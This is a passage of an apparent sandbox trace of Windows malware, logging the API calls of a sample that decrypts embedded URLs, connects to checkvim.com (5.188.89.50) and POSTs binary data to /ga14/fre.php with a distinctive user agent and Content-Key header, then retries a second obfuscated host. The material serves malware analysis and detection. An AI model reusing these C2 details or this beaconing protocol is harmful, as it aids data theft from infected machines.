GetProcessHeap () returned 0x840000 [0250.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0250.389] GetProcessHeap () returned 0x840000 [0250.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0250.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.391] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0250.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.399] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0250.407] GetProcessHeap () returned 0x840000 [0250.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0250.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.409] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0250.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.410] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0250.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.411] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.411] GetProcessHeap () returned 0x840000 [0250.411] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0250.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.413] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0250.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.414] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0250.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.429] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0250.429] GetProcessHeap () returned 0x840000 [0250.429] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0250.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.431] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0250.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.432] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0250.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.434] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0250.434] GetProcessHeap () returned 0x840000 [0250.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0250.434] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0250.436] GetProcessHeap () returned 0x840000 [0250.436] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c18 [0250.436] socket (af=2, type=1, protocol=6) returned 0x37c [0250.437] connect (s=0x37c, name=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0250.509] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0250.509] GetProcessHeap () returned 0x840000 [0250.509] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fb50 [0250.509] GetProcessHeap () returned 0x840000 [0250.509] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8815d0 [0250.510] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0250.511] wvsprintfA (in: param_1=0x8815d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0250.511] GetProcessHeap () returned 0x840000 [0250.511] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0250.511] GetProcessHeap () returned 0x840000 [0250.512] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815d0 | out: hHeap=0x840000) returned 1 [0250.512] GetProcessHeap () returned 0x840000 [0250.512] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0250.512] GetProcessHeap () returned 0x840000 [0250.512] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8815d0 [0250.512] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0250.513] wvsprintfA (in: param_1=0x8815d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0250.513] GetProcessHeap () returned 0x840000 [0250.513] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0250.513] GetProcessHeap () returned 0x840000 [0250.513] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815d0 | out: hHeap=0x840000) returned 1 [0250.514] send (s=0x37c, buf=0x873a58*, len=237, flags=0) returned 237 [0250.514] send (s=0x37c, buf=0x87eb58*, len=159, flags=0) returned 159 [0250.514] GetProcessHeap () returned 0x840000 [0250.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8815d0 [0250.514] recv (in: s=0x37c, buf=0x8815d0, len=4048, flags=0 | out: buf=0x8815d0*) returned 237 [0250.860] GetProcessHeap () returned 0x840000 [0250.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0250.860] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0250.861] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0250.861] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fb50 | out: hHeap=0x840000) returned 1 [0250.861] closesocket (s=0x37c) returned 0 [0250.861] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c18 | out: hHeap=0x840000) returned 1 [0250.861] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0250.861] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0250.861] GetProcessHeap () returned 0x840000 [0250.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0250.861] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8815d0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf54) returned 0x37c [0250.864] Sleep (dwMilliseconds=0xea60) [0250.866] GetProcessHeap () returned 0x840000 [0250.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0250.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.867] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0250.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.875] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0250.883] GetProcessHeap () returned 0x840000 [0250.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0250.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.884] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0250.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.886] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0250.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.887] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.887] GetProcessHeap () returned 0x840000 [0250.887] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0250.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.888] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0250.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.890] CryptDestroyKey (hKey=0x87e870) returned 1 [0250.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.891] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0250.891] GetProcessHeap () returned 0x840000 [0250.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0250.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.892] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.893] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.897] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.899] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.899] GetProcessHeap () returned 0x840000 [0250.899] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0250.899] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0250.899] GetProcessHeap () returned 0x840000 [0250.899] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0250.899] GetProcessHeap () returned 0x840000 [0250.899] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0250.899] GetProcessHeap () returned 0x840000 [0250.899] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0250.899] GetProcessHeap () returned 0x840000 [0250.899] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0250.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.901] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0250.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.908] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0250.916] GetProcessHeap () returned 0x840000 [0250.916] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0250.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.917] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0250.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.918] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0250.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.919] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.919] GetProcessHeap () returned 0x840000 [0250.919] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0250.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.921] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0250.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.922] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0250.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.923] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0250.923] GetProcessHeap () returned 0x840000 [0250.923] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0250.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.925] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0250.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.926] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0250.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.927] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0250.927] GetProcessHeap () returned 0x840000 [0250.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0250.927] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0250.930] GetProcessHeap () returned 0x840000 [0250.930] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0250.930] socket (af=2, type=1, protocol=6) returned 0x380 [0250.930] connect (s=0x380, name=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0251.004] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0251.004] GetProcessHeap () returned 0x840000 [0251.004] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fd70 [0251.005] GetProcessHeap () returned 0x840000 [0251.005] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8815d0 [0251.009] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0251.010] wvsprintfA (in: param_1=0x8815d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0251.010] GetProcessHeap () returned 0x840000 [0251.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0251.010] GetProcessHeap () returned 0x840000 [0251.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815d0 | out: hHeap=0x840000) returned 1 [0251.010] GetProcessHeap () returned 0x840000 [0251.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0251.010] GetProcessHeap () returned 0x840000 [0251.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8815d0 [0251.010] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0251.011] wvsprintfA (in: param_1=0x8815d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0251.011] GetProcessHeap () returned 0x840000 [0251.011] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0251.011] GetProcessHeap () returned 0x840000 [0251.011] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815d0 | out: hHeap=0x840000) returned 1 [0251.011] send (s=0x380, buf=0x873a58*, len=237, flags=0) returned 237 [0251.013] send (s=0x380, buf=0x87eb58*, len=159, flags=0) returned 159 [0251.013] GetProcessHeap () returned 0x840000 [0251.013] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8815d0 [0251.013] recv (in: s=0x380, buf=0x8815d0, len=4048, flags=0 | out: buf=0x8815d0*) returned 237 [0251.397] GetProcessHeap () returned 0x840000 [0251.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0251.397] GetProcessHeap () returned 0x840000 [0251.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0251.397] GetProcessHeap () returned 0x840000 [0251.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0251.397] GetProcessHeap () returned 0x840000 [0251.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fd70 | out: hHeap=0x840000) returned 1 [0251.397] closesocket (s=0x380) returned 0 [0251.399] GetProcessHeap () returned 0x840000 [0251.399] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0251.399] GetProcessHeap () returned 0x840000 [0251.399] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0251.399] GetProcessHeap () returned 0x840000 [0251.399] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0251.399] GetProcessHeap () returned 0x840000 [0251.399] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0251.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8815d0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x8fc) returned 0x380 [0251.402] Sleep (dwMilliseconds=0xea60) [0251.464] GetProcessHeap () returned 0x840000 [0251.464] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0251.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.466] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0251.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.511] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0251.527] GetProcessHeap () returned 0x840000 [0251.527] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0251.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.528] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0251.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.529] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0251.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.530] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.530] GetProcessHeap () returned 0x840000 [0251.530] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0251.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.532] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0251.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.547] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0251.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.549] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0251.549] GetProcessHeap () returned 0x840000 [0251.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0251.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.550] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.551] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.552] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.553] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.553] GetProcessHeap () returned 0x840000 [0251.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0251.553] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0251.554] GetProcessHeap () returned 0x840000 [0251.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0251.554] GetProcessHeap () returned 0x840000 [0251.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0251.554] GetProcessHeap () returned 0x840000 [0251.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0251.554] GetProcessHeap () returned 0x840000 [0251.554] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0251.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.555] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0251.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.564] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0251.572] GetProcessHeap () returned 0x840000 [0251.572] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0251.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.574] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0251.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.575] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0251.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.576] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.576] GetProcessHeap () returned 0x840000 [0251.576] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0251.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.578] 